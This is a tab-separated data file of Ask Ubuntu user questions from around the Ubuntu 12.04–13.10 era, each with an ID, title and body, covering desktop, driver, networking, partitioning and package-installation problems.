369217	launcher ( lh toolbar ? ) no-show in 13-10 installs	in 13-04 , my launcher failed to appear . i tried dozens of suggested fixes and no joy . i just installed 13-10 on this machine and get the same result ( desktop but no launcher . i had been using a xfx geforce 9800gt card . removed it and re-installed . still no launcher . i have also used an evga gtx550t . same result . so the problem does not change with different graphics cards . should i do a complete install with re-format ? i have not had this machine usable for over six months . many thanks in advance . dave mallery
369218	only my home wifi is grayed out in ubuntu 12.0.4	when i was setting up ubuntu ( for the first time ) on my netbook running xp , i decided to skip the network set up initially . now i can connect to all my neighbors wifi networks , but my home network is grayed out .
369219	how to get working firefox bookmarks scope ?	i upgraded to ubuntu 13.10 , and saw that there is now a package `` unity-scope-firefoxbookmarks '' , and i see in the dash sources list : however , i can not find any of my bookmarks from the dash ( the source button is always off ) . there is something to enable , or a service to start in order to indice bookmarks ?
369221	trouble switching to dvorak on ubuntu 12.04	i 've decided to switch to dvorak on my ubuntu machine , but i 'm having some trouble : first , i attempted to do this through the gui -- system settings - > keyboard layout - > add layout ( plus sign ) - > english ( programmer dvorak ) . this did n't work at first , so i restarted my machine . it seemed to work at the password prompt ( if only because qwerty did not ) , but i could n't get it to accept my password . i used the virtual keyboard option to enter my password with mouse clicks ( the virtual keyboard was using the programmer 's dvorak standard ) and was able to get in that way . once logged in , however , i was back to qwerty . second , i tried to switch on the command prompt -- $ loadkeys /usr/lib/kbd/keytables/dvorak.map the error message i received was `` could n't get a file descriptor referring to the console '' does anyone know what i 'm doing wrong ? i 've looked for a solution for these problems , but could n't find anything .
369223	ubuntu 12.04 , ca n't find my home wifi network	i 've tried several solutions i found on the web , but did n't manage to solve a problem . since today my laptop wo n't find my wifi network , but neighbours ' networks are suggested . another laptop with u12.04 does find one . what do i do ? i 've dell latitude-e4310 , 02:00.0 network controller : broadcom corporation bcm4313 802.11bgn wireless network adapter ( rev 01 ) subsystem : dell inspiron m5010 / xps 8300 flags : bus master , fast devsel , latency 0 , irq 17 memory at f2c00000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : brcmsmac kernel modules : bcma , brcmsmac also networkmanager tool state : connected ( global ) - device : eth1 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : 802.11 wifi driver : wl state : disconnected default : no hw address : 1c:65:9d:7a:45:5c capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes should i provide anything else ? many thanks in advance . upd : http : //pastebin.com/nfzbk2hq
369226	how do i completely remove the global menu on ubuntu 13.10 ?	i want to know how can i remove the global menu bar completely . the old tweaks for 12.04 is n't work completely for all apps like the terminal and nautilus .
369227	evga gtx650ti boost / ubuntu 12.04 / 2 x-star wqhd	i bought 2 x-star wqhd monitors which , predictably , did not work with my on board video card . yesterday i installed the evga card and have been trying to get the nvidia drivers to work . i tried to install the 304 .run , i tried to remove that and then install the nvidia-current , then i tried to activate the proprietary driver from within ubuntu ... for the first couple of attempts , i was able to see 800x600 or something close on the x-star displays but now all i see is flashing colors on those . on my older samsung monitor ( s22b300b 21.5 '' ) is still displaying through the evga card . any thoughts on how to go about fixing this ? lspci -nnk | grep -ia2 vga 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation gk106 [ geforce gtx 650 ti boost ] [ 10de:11c2 ] ( rev a1 ) subsystem : evga.com . corp. device [ 3842:3656 ] kernel driver in use : nvidia kernel modules : nvidia_304 , nvidia , nouveau , nvidiafb subsystem : evga.com . corp. device [ 3842:3656 ] kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel lsmod | grep nvidia nvidia 11313399 67 cat /etc/x11/xorg.conf section `` device '' identifier `` default device '' option `` nologo '' `` true '' endsection
369228	how to recognize an optimus laptop ?	kellogs @ kellogs-k52jc ~ $ lspci 00:00.0 host bridge : intel corporation core processor dram controller ( rev 18 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 18 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 06 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 06 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 06 ) 00:1c.5 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 6 ( rev 06 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a6 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 06 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 4 port sata ahci controller ( rev 06 ) 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 06 ) 02:00.0 network controller : atheros communications inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 ) 03:00.0 system peripheral : jmicron technology corp. sd/mmc host controller ( rev 80 ) 03:00.2 sd host controller : jmicron technology corp. standard sd host controller ( rev 80 ) 03:00.3 system peripheral : jmicron technology corp. ms host controller ( rev 80 ) 03:00.4 system peripheral : jmicron technology corp. xd host controller ( rev 80 ) 03:00.5 ethernet controller : jmicron technology corp. jmc250 pci express gigabit ethernet controller ( rev 03 ) ff:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 05 ) ff:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 05 ) ff:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 05 ) ff:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 05 ) ff:02.2 host bridge : intel corporation core processor reserved ( rev 05 ) ff:02.3 host bridge : intel corporation core processor reserved ( rev 05 ) kellogs @ kellogs-k52jc ~ $ inxi -sgx system : host : kellogs-k52jc kernel : 3.5.0-17-generic x86_64 ( 64 bit , gcc : 4.7.2 ) desktop : kde 4.9.5 ( qt 4.8.3 ) distro : linux mint 14 nadia graphics : card : intel core processor integrated graphics controller bus-id : 00:02.0 x.org : 1.13.0 drivers : intel ( unloaded : fbdev , vesa ) resolution : 1920x1080 @ 60.0hz glx renderer : mesa dri intel ironlake mobile glx version : 2.1 mesa 9.0.3 direct rendering : yes kellogs @ kellogs-k52jc ~ $ lshw [ ... ] *-display description : vga compatible controller product : core processor integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 18 width : 64 bits clock : 33mhz capabilities : vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:44 memory : d0000000-d03fffff memory : c0000000-cfffffff ioport : e080 ( size=8 ) manufacturer advertises the k52jc model which i bought as optimus enabled . however , no traces of it in the output above . of course , bumblebee would not start on this machine . should i rest assured that is a defective / un-optimused machine ?
369230	how to let screen time out on sign in screen	i have ubuntu 13.10 set up on an older pc . if i am logged in as a user , then the screen timeout and power saving mode works as expected . however , if nobody is logged in , the screen never times out , and the monitor stays on all the time with the login screen . how can i adjust ubuntu 13.10 so that the login screen also times out after a minute or so ? i do n't want the monitor 's power saving mode to be disabled just because nobody is currently logged in .
369231	juju mysql adding units vs adding new service with relation	what 's the point of adding units to mysql ? why not just create a new service with relation to the master node ? mysql does n't support multi-master node so adding units to one mysql service does n't make any sense . if i create a second service as a slave and add units to that to act as multiple slaves still does n't make sense because if the primary slave server dies all the unites attached to it become useless as well . can anyone explain why i should add units to mysql ?
369232	having trouble installing guest additions for a xubuntu 13.10 guest os in virtualbox 4.2.10	i am using ubuntu 13.04 64-bit as my host operating system running virtual box 4.2.10 . i get this message when i tell virtualbox to install guest additions ( ctrl+d ) , mounting the volume in the guest os and run the vboxlinuxadditions.run file using root by : sudo ./vboxlinuxadditions.run it starts and then comes to these error messages : verifying archive integrity ... all good . uncompressing virtualbox 4.2.10 guest additions for linux ... ... ... . virtualbox guest additions installer removing existing virtualbox non-dkms kernel modules ... done . building the virtualbox guest additions kernel modules the headers for the current running kernel were not found . if the following module compilation fails then this could be the reason . building the main guest additions module ... done . building the shared folder support module ... fail ! ( look at /var/log/vboxadd-install.log to find out what went wrong ) doing non-kernel setup of the guest additions ... done . installing the window system drivers warning : unknown version of the x window system installed . not installing x window system drivers . installing modules ... done . installing graphics libraries and desktop services components ... done . allusers @ allusers-virtualbox : /media/allusers/vboxadditions_4.2.10_84104 $ i followed everything from the official virtualbox manual on installing guest additions for linux i used some other commands such as : sudo apt-get install build-essential linux-headers- $ ( uname -r ) dkms and : sudo apt-get install virtualbox-guest-x11 i rebooted after executing those command and it still wont work . it still says the kernel modules are missing and the window is not seamless . any idea what could be the problem ? here is the log file vboxadd-install.log
369237	after completing the installation of play on linux , the page is hang with windows agreement page	after completing the installation process of play on linux . it stuck up with a message and it 's not going further ahead . the message is basically : end user license agreement for microsoft software ( web eula ) if i shut down , the installation is not complete . i am unable to attach the image as i am new . please let me know how to get out of this .
369239	lubuntu full install on usb drive with full disk encryption and grub2	i apologise for the wall of text , but i want you to scrutinize my thought-process to make sure there 's no mistakes and no other way around it : i wish to have a full install of lubuntu with full disk encryption on one of my usb drives . the laptop i would be booting it from also has windows 7 . i want to maintain that os . from what i 've read i must place grub2 on the usb drive so that : if i have the usb plugged in , the laptop would start lubuntu ( having usb > hd in the bios boot options ) if i do n't have the usb plugged in , it would normally start windows 7 . that 's exactly what i want it to do . but : if i install from the normal .iso : clicking `` install lubuntu alongside them '' would install it onto my normal hd . clicking `` erase disk and install lunbuntu '' would delete all the stuff i have in my hd and install lubuntu on it . clicking `` something else '' would allow me to choose to install lunbuntu and grub2 onto the usb drive , but would not provide it with encryption . so the normal .iso wo n't work for what i want . then i found the alternate .iso and this tutorial : it allows me to install lubuntu with all the options i want and gives me the option to choose where to place the grub2 ! hopefully there are no flaws in my train of thought . if there are n't , i have a few questions regarding that tutorial : the author says in his case choosing `` yes to install grub to your mbr '' installed the grub to the usb drive 's mbr . i ca n't have `` in his case '' . i need to be sure that 's what it will do , so that it does n't mess up the windows boot loader . choosing `` no '' would open this window and allow to choose where i want to install the grub . unfortunately i do n't understand which option i should type in the box to install it into the usb drive . would removing my laptop 's hard drive ensure that the grub is installed onto the usb drive if i picked first option , `` yes '' ? i apologise once again for the wall of text and appreciate any help you guys can offer me .
369240	juju mysql for wordpress with percona	is there any benefit in using percona as a distro for wordpress ? does it actually allow me to use extradb or is it still limited to innobd ?
369243	can i make sudo time out during hibernation ?	i had hibernated my laptop using sudo pm-hibernate and then woke it up some hours later to quickly check a document . i re-entered the above command and it worked without requiring a password . i assume this means that the sudo timeout is working from a relative time that is only ticking when the computer is awake , rather than an absolute system time . i would prefer not to have sudo work without a password when i have n't entered it , in real terms , in the very recent future . is there a way to enforce the timeout to not carry over like this while the system is in hibernation ?
369244	what causes ubuntu to become randomly laggy and not fix until i restart ?	i can use the computer for 2 hours without a problem , then when i do any random memory hungry action ( youtube video , starting many application simultaneously ) the computer becomes very slow and stays like that even if i kill many processes . i do n't know what causes this and even the gnome system monitor shows normal memory and cpu usage . restarting the x session does n't fix it and the only way to get my computer back to normal is with a system reboot . i 'm using ubuntu 12.04 with xcfe . how can i detect the source of this behaviour ? and how can i fix sluginess without restarting the computer ?
369246	automatically enable emacs whitespace mode	i am using emacs 23 . how can i automatically enable emacs white space mode whenever i start emacs ? thank you .
369252	13.10 mouse and keyboard slow to start after reboot	after a reboot which i do because of other issues , the mouse and keyboard drivers are slow to load up to two minutes after wireless is established . this started after upgrading from 13.04 to 13.10 in fact a couple times my mouse disappeared and i had to research without a mouse . i was able to get the mouse working when it disappeared with this command : gsettings set org.gnome.settings-daemon.plugins.cursor active false what can i do to load the mouse and keyboard like before instantly upon reboot ?
369253	no login screen after boot without external monitor	i 've had this issue on multiple ubuntu based distros , the most recent being elementaryos luna . basically , i keep my laptop plugged into a 1280x1024 monitor at home . whenever my laptop is powered off and the monitor is unplugged ( for example , when i take it to class in the morning and it is already off ) i am not presented with a login screen . i can see the post screen as well as the boot-splash , but then the screen goes blank ( but the backlight remains on ) . is there another fix other than simply adjusting my display configuration before shutting down ? my laptop has a 2nd gen i3 in it and no other graphics card . edit : i should add that even with the monitor connected , i can no longer see any login screen or switch to any vt . this happened before on a different distro , and i had to re-image my linux partition .
369258	ubuntu live cd upgrade option grayed out ( 13.10 )	i currently have windows 7 and ubuntu 13.04 on the same hd . i would like to upgrade ubuntu 13.04 to 13.10 without using the internet . so i inserted the usb drive and it detects my windows 7 and my ubuntu 13.04 installation perfectly . but the first choice in the list which is : '' upgrade ubuntu 13.04 to ubuntu 13.10 documents , music and other personal files will be kept . installed software will be kept where possible . system wide settings will be cleared . '' it is completely grayed out . but that is the option i would like to chose and i do n't know why it is disabled . what must i do to enable that option ? else can i upgrade my installation by booting the live cd ?
369259	how to download build essential without internet connection on lubuntu ?	hello i have a problem on my pc and i need to install or activate the ethernet card drives , and i need the program `` make '' and its contained in the package build essential , how i can download all the files to install it on the pc less internet ? i have another pc with dualboot with ubuntu 13.04 , but i need the package to lubuntu 13.04 i do n't know if there exist any difference , so if not how i can download it from ubuntu and installing it on lubuntu ? thanks a lot !
369262	gparted- how to increase size of partition near start of drive ?	my drive looks something similar to this ( from start to end of drive ) : /dev/sda1 100 mb ntfs system reserved /dev/sda2 21.48 gib : extended /dev/sda5 13.68 gib ext 4 /dev/sda6 7.8 gib linux swap /dev/sda3 146.49 gib ntfs unallocated 55.50 gib unallocated i want to increase the size of my linux partition ( i 'm not sure if i need to increase the whole `` extended '' or just `` ext 4 '' ? ) to use up all of the unallocated disc . could someone please walk me through what i need to do ? i thought it would let me just specify the extended to increase in size and then shift the windows 7 partition accordingly , but its not letting me and warned about not being able to boot the windows 7 partition .
369263	juju bootstrap fails with `` temporary failure in name resolution '' using amazon aws	i have followed the instructions over at https : //juju.ubuntu.com/docs/config-aws.html to try and setup myself with a juju environment . it all seemed to setup alright . ssh keys , gererate config , repository , adding access id and secret keys to environments.yaml file . although my key file from aws iam management console was called credentials.csv rather than rootkey , i could n't find that link described in the documentation . when i give the command juju bootstrap in the testing page . it fails giving me the error : juju bootstrap error get https : //s3-us-west-1.amazonaws.com/juju-gobblygookmynukmbersinhere/provider-state : lookup s3-us-west-1.amazonaws.com : temporary failure in name resolution ( note i just replaced my numbers for this posting my actual terminal has my numbers in . this is my first attempt at any ec2 work so i have gone in and created new iam profiles . what have i done wrong ? any help would be great . i think i 'm in over my head !
369268	missing `` .sty '' package	i have installed texlive on ubuntu 13.04 following the instructions provided in http : //www.tug.org/texlive/acquire.html but i always get some missing .sty error ( for instance siunitx.sty ) . i struggled a lot to make it run . double checked the path , etc . but could not figure out the problem . do you know what the problem can be ? best mehdi
369269	does tor protect privacy of bittorrent clients like transmission ?	i am using the tor bundle and its included browser to initiate torrent downloads with the transmission client included with lubuntu . clicking on a torrent link provides a warning message that external apps are not protected by tor and clicking ok results in normal transmission start and it begins the download . i have seen assertions in another post answer that tor starts transmission using a different profile than the normal $ home/.config/transmission . however , i see no evidence of the referenced different profile on my system ( $ home/tor-browser_en-us/.config/transmission ) . the normal privacy settings provided within transmission seem inadequate for privacy according to what i have read . has something changed in how tor bundle browser ( firefox ) interacts with supporting apps like transmission . tor bundle otherwise seems to be operating correctly . i asked the question in the post but it was deleted by moderator for some reason not given
369270	how do i log into the forum ?	i am a somewhat experienced linux user , but i am new to ubuntu . upon running into a few difficulties getting my graphics card set up and not being able to find suitable help by googling , i decided to break down and ask for help . after a quick search or two , ubuntu forums seems like the logical choice . so , i headed over to ubuntu one and setup my account . i input my name and my email address , and verified the confirmation email . but , when i try to use my account to log in , i get the following message : the following errors occurred during your registration : that username is already in use or does not meet the administrator 's standards . if you are brad2 and you have forgotten your password , click here . after a quick search , i found these threads that reference the same problem i 'm having : http : //ubuntuforums.org/showthread.php ? t=2115039 http : //ubuntuforums.org/showthread.php ? t=2183931 but , no one seems to be offering a solution . so , i am posting my question here . how ironic i ca n't even post this question in the forum , because my problem is getting logged into the forum . i am sure that there are a lot of frustrated would-be ubuntu users who are just as frustrated as i am , but upon not being able to even log into the forum are simply giving up and going back to windows . can someone help me ?
369276	add/remove keyboard layout by console command	after upgrading to 13.10 it looks like we have no more deal with xkb for layout settings and input language switching , so i have a question . some times i need to add one ore two more input languages and remove them after little time . it 's frequently operation , and in the pas there was a way to make it simple , like : setxkbmap -layout `` us , ru , de '' so i was able to bind such command to hotkeys and add or remove needed language very fast and easy . for now setxkbmap no affect laout at all , so what can i do ? i tried to do something like : gsettings set org.gnome.desktop.input-sources sources `` [ ( 'xkb ' , 'us ' ) , ( 'xkb ' , 'ru ' ) , ( 'xkb ' , 'ar ' ) ] '' and it really added layout to keyboard-indicator , but wa n't change the input at all , so if i open gui settings tool , i wa n't find there new language . i tried also to do : gsettings set org.gnome.libgnomekbd.keyboard layouts `` [ 'us ' , 'ru ' , 'de ' ] '' but that have no effect at all . diff between gsettings list-recursively before adding new layout from gui and after that is n't showing any difference except in org.gnome.desktop.input-sources sources , diff between gconftool-2 -- recursive-list before and after ins n't showing any differences at all . give me pleace any solution to make that working . console command or even api-call to do that . i think writing simple app is n't a problem .
369284	install grub2 on uefi gpt , create /boot partition and transfer clonezilla image	i would like to do the following : given : a windows system on gpt and uefi with unallocated space on which one wishes to deploy ubuntu an ubuntu partition , and seperate partitions for /boot and swap deploy a clone of the ubuntu partition on said windows system . in order to do that , one has to presumably : install grub2 on the mbr create a /boot and swap partitions for the ubuntu transfer the ubuntu clone to the new partition assuming the workflow specified is correct , the following questions arise : does one deploy a cloned boot partition ? what software does one use to create the /boot or modify it if necessary ? ( it would appear that from screenshots , bootrepair can create a seperate /boot for partition , however , the question arises , can bootrepair facilitate creation of a fresh /boot ? ) what steps does one need to perform link the /boot to the cloned partition what steps does one need to perform to add the newly cloned ubuntu to grub2 ? is there an automated way to install grub2 to replace the windows bootloader , including performing the steps specified here : http : //www.wensley.org.uk/gpt 6 . is there a script to perform the above in an automated way with presumably the input being ( cloned / , /boot and unallocated space ) and the output being as specified ? is # 6 reasonable doable as provided by the current apis of bootrepair and clonezilla ? ie , perhaps i do n't want to implement grub2 installation the reason i ask # 5 is because : i installed ubuntu ( /boot , swap , os ) on unallocated space on a uefi gpt windows system . however , it did not ( appear to ) install grub and switching between os is performed by specifying the boot order in bios . it is specified as a general instruction in the wiki to run bootrepair to presumably facilitate a fix to this but it is not explicitly specified if that is the problem at which the instructions are aimed at ( ie the language is , running bootrepair solves most issues ) so does bootrepair perform # 5 in a complete manner ? it is further specified in various instructions to boot relevant live cds with uefi . in my bios , the boot order is specified by simply hitting enter on the menu phrase `` uefi boot '' . presumably , media booted in said boot order is booted with uefi . please confirm this is what the instruction specifies .
369286	unchanged files keep syncing	every time i boot up , i get this message : [ filename ] and 47 other files are being synchronized to your ubuntu cloud . i have n't touched these files in months ( and this is correctly reflected in the file timestamps ) , yet it claims to be synchronizing them every day . i found another post in which someone suggested using magicicada to debug this , but it crashes on startup for me . i also tried running u1sdtool . it does n't seem to provide much diagnostic data unless i happen to catch it right at startup , but it is currently saying there are no dirty nodes . does anyone else have this problem ?
369292	xubuntu 13.10 and ubuntu 13.10 both show wpa supplicant error ?	why am i getting this error . how do i fix it ? sudo lshw -c network *-network description : wireless interface product : ar9485 wireless network adapter vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : 74 : e5:43 : f2:18 : cd width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list rom ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.11.0-12-generic firmware=n/a ip=192.168.1.154 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : f7d00000-f7d7ffff memory : f7d80000-f7d8ffff *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0.2 bus info : pci @ 0000:03:00.2 logical name : eth0 version : 0a serial : 08:60:6e:04 : ac : b6 size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl8411-1_0.0.3 06/18/12 latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:42 ioport : e000 ( size=256 ) memory : f0004000-f0004fff memory : f0000000-f0003fff using ifconfig : ifconfig eth0 link encap : ethernet hwaddr 08:60:6e:04 : ac : b6 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:2644 errors:0 dropped:0 overruns:0 frame:0 tx packets:2644 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:243135 ( 243.1 kb ) tx bytes:243135 ( 243.1 kb ) wlan0 link encap : ethernet hwaddr 74 : e5:43 : f2:18 : cd inet addr:192.168.1.154 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :76e5:43ff : fef2:18cd/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:253274 errors:0 dropped:2 overruns:0 frame:0 tx packets:134379 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:348427070 ( 348.4 mb ) tx bytes:13362722 ( 13.3 mb ) error message : http : //s16.postimg.org/6vtwca0v9/screenshot_10312013_08_07_03_pm.png http : //s12.postimg.org/cwcw0ydl9/screenshot_10312013_08_07_57_pm.png
369295	multi-touch capabilities for ubuntu 12.04 ? how can i configure the system to support it ?	i installed ubuntu 13.10 , it supports default multi-touch perfectly ! i need ubuntu 12.04 , however , it does not appear to support multi-touch features . i write a touch test program , it supports touch and mousemove at the same time , but i just need touch function . i know we can set the device to grab bits . but how can i configure the system to support it ? it gives me an error when i try to use multi-touch .
369296	external hard drive issue	i am running ubuntu 12.04 and i have a 500gb external hard drive , formatted in ext4 , which i have used for about a year to store batches of data that i am sifting through . about once a week i move a chunk of data from the external drive to my internal drive for processing . as i do that i delete the data from the external drive and empty the trash , thereby clearing up space on the external and also preventing myself from grabbing stuff that i 've already sorted through . the vast majority of this is text files , but there are a few .jpegs and .mp4s thrown in , if that matters . anyway , this has been working without a hitch for nearly a year . so today i plug in the drive and i have an odd issue . i was able to move folders from the external over to my internal drive with no problem , but when i tried to delete those files i was unable to do so . i kept getting the `` unable to send file to trash , do you wish to delete permanently ? '' message . i clicked yes / delete all , but no files were actually deleted . it just sat there . even worse , while the system was trying in vain to delete those files i was unable to move more files over . in short , i was stuck . i canceled the operation , unmounted and remounted the drive , and then i had an even bigger problem . i have a spreadsheet of all the different folders on there ( exactly 818 ) and yet when i opened the drive in nautilus , it was only finding 512 folders . so i had 306 missing folders , but my free space was unchanged . immediately i think that the drive may be corrupted . i went into disk utility and ran the check disk option . it said that the drive was not clean , but offered no remedy or option to repair . i went back into the drive in nautilus and once again attempted to delete the files i had already moved . same issue . i clicked on details and it said that it was unable to create a trashing file i/o error . i 've looked , and it 's not a permissions issue . the drive and all folders that are in it all belong to me , and they are all read / write . i 've started running badblocks on the drive , but it looks like that is going to take several hours to complete . any ideas ?
369299	how can i get data off of a ( probably ) very corrupt drive ?	so , my younger brother wanted my help today . apparently , he was helping a friend install ubuntu to his laptop , and midway through the install ( on a filled hard-drive with windows 8 , from the liveusb thing ) : 1 ) they realized that they had chosen `` erase and install '' accidentally and decided the best course of action was to ( in the middle of an install , remember ) 2 ) force shutdown the computer . after i had replaced my eyeballs back into their sockets , my bro asked if i could do anything about his friend 's data , which he wanted back . this , however , drifts out of my normal comfort zone . i know this about the install : 1 ) it was on a fairly new windows 8 laptop , so it had whatever filesystem it uses nowadays on the entire drive 2 ) they did n't choose the `` zero out drive data '' option 3 ) they stopped the install at some point ( not sure if before or after wipe ) i can imagine that it now has two corrupted filesystems on it ( whatever windows 8 was on and ext3 ) and that some of the data still exists ( assuming it was n't overwritten already ) . is there anything that can be done for whatever data is left on the drive ?
369300	give domain users administrator account or access to software center	i have installed ubuntu 12.04 lts on a couple of machines . the domain is running windows . i have managed to add machines in domain with likewise-open and give sudo access to domain groups . problem is that domain user are `` standard '' users and when trying to use ubuntu software center or synaptic packet manager their are asked for the administrators account password . the domain user have sudo access but the pc 's will be used for office work and the people using them are not familiar with terminal and command lines . and the software center has pictures and description of the app making it easy to choose the right ones . i am looking for a way to promote all existing and future accounts that belong to a group in the domain to be administrator level accounts or for a way to give all users in a group access to software center and maybe all other applications that require authentication from administrator account . when a standard user starts synaptic or software center they are asked for administrator password and no manual login for example is available .
369302	how to debug a build failure which can not be reproduced outside of a launchpad build environment ?	i am attempting to build a modified libdbusmenu package . it builds correctly if i build it locally : sudo apt-get build-dep libdbusmenu wget https : //launchpad.net/~a-j-buxton/+archive/dbusmenu/+files/libdbusmenu_12.10.3 % 2b13.10.20130913-0ubuntu2.1.diff.gz wget https : //launchpad.net/~a-j-buxton/+archive/dbusmenu/+files/libdbusmenu_12.10.3 % 2b13.10.20130913-0ubuntu2.1.dsc wget https : //launchpad.net/~a-j-buxton/+archive/dbusmenu/+files/libdbusmenu_12.10.3 % 2b13.10.20130913.orig.tar.gz dpkg-source -x libdbusmenu*.dsc cd libdbusmenu* dpkg-buildpackage however , in a ppa , one of the tests fails to run which causes the build to fail . the actual test output is not written to the buildlog : https : //launchpadlibrarian.net/155471644/buildlog_ubuntu-saucy-amd64.libdbusmenu_12.10.3 % 2b13.10.20130913-0ubuntu2.1_failedtobuild.txt.gz how can i solve this issue ? it might come down to more closely reproducing the build environment used by the ppa builders . if so , how do i do that ? i have tried building using a pbuilder chroot - this works correctly on my local system . lintian produces the following warnings on the package : w : libdbusmenu source : quilt-build-dep-but-no-series-file w : libdbusmenu source : patch-system-but-no-source-readme w : libdbusmenu source : ancient-standards-version 3.9.2 ( current is 3.9.4 )
369303	please help me with my dual monitors !	okay , so i have a new dual-monitor set-up , but you know how when you move the mouse to the left , it goes to the screen on the left , and visa versa ? well , for me , i have to move my mouse to the right to get it to go to the screen on the left , and visa versa . can anyone help me fix this without moving my monitors ? please , its getting all my nerves ...
369305	amarok 2.8 installation error	i decided to try kde desktop and installed it ( downloaded kde-full package ) . then i wanted to install the latest version of amarok player , added repository sudo add-apt-repository ppa : kubuntu-ppa/backports sudo apt-get update then to install amarok 's latest version i typed sudo apt-get install amarok it started installing ( about 40 mbs of package ) . then it asked me to terminate some processes ( i do n't remember them ) and i accepted to terminate . my ubuntu never opened again after shutting down the computer it . i was stuck before the login screen at : could not write bytes broken pipe . i could not manage to get over that error as it did n't let me do anything at that screen and i did a fresh install of ubuntu , then kde-full again . now , again , i want to install amarok but this time i tried synaptic package manager . it tells me that this packages will be uninstalled : https : //dl.dropboxusercontent.com/u/66945645/snapshot1.jpg this made me angry to install amarok again . i will be waiting for a guide to install amarok . thank you all and sorry if this a noob question .
369306	i have the iso image but wubi again downloading the whole data ?	i downloaded the kubuntu 13.10 via torrent . but when i extracted the data and attempted to install kubuntu while in windows , the wubi connects to the internet and downloads the whole iso data again , so i cancelled the installation . what to do ?
369310	how to fix missing libudev.so.0 for chrome to start again ?	trying to start chrome yields in following error on the command line : /opt/google/chrome/chrome : error while loading shared libraries : libudev.so.0 : can not open shared object file : no such file or directory the error first appeared in ubuntu 13.04 , i tried purging and reinstalling chrome . it persisted after upgrading to ubuntu 13.10 .
369313	low disk space message , but disk usage says 377gb available	ubuntu keeps popping up with a low disk space message but when i click examine , it shows that i have 377gb available . i 'm running a dual boot ubuntu 12.04/windows 7 machine . when i set up the system , i made the mistake of not setting up separate partitions . i also made the mistake of not defragmenting the hdd before i installed ubuntu . this probably has something to do with this error i 'm getting , but i 'm not really sure how to fix it at this point . results of df in terminal are below ( sda3 is the windows partition ) : filesystem 1k-blocks used available use % mounted on /dev/loop0 10698000 9191144 956764 91 % / udev 1912128 4 1912124 1 % /dev tmpfs 768628 868 767760 1 % /run none 5120 0 5120 0 % /run/lock none 1921564 5520 1916044 1 % /run/shm /dev/sda4 367694844 117809712 249885132 33 % /host /dev/sr0 419820 419820 0 100 % /media/suarez disk 2 /dev/sda3 104857596 88757972 16099624 85 % /media/62501f1f501ef98d df -h : filesystem size used avail use % mounted on /dev/loop0 11g 8.8g 935m 91 % / udev 1.9g 4.0k 1.9g 1 % /dev tmpfs 751m 868k 750m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 1.9g 5.5m 1.9g 1 % /run/shm /dev/sda4 351g 113g 239g 33 % /host /dev/sr0 410m 410m 0 100 % /media/suarez disk 2 /dev/sda3 100g 85g 16g 85 % /media/62501f1f501ef98d
369315	there 's no way to specify availability zone in openstack provider , is there ?	you can only choose which region , but not availability zone within that region ?
369317	why are ppa 's designed for only latest version of blender ?	why are ppa 's set to only retain the latest version of the software ? i ask because i just installed blender 2.69 and it constantly crashes on me ; i then decided to just install 2.68a but found that it is impossible to install an older version of software using the ubuntu software center . i turned to possibly seeing if the ppa retained an older version but have found most ppa 's remove older versions as they are designed to only offer the latest . how does this sound like a good idea ? what if , for example , someone releases a version of their software that constantly crashes and the user wishes to get an older version but because the way ppa 's are designed they can not . sounds familiar ... to add insult to injury , i was easily able to role back internet explorer to version 9 on a machine at work today ; that is just sad .
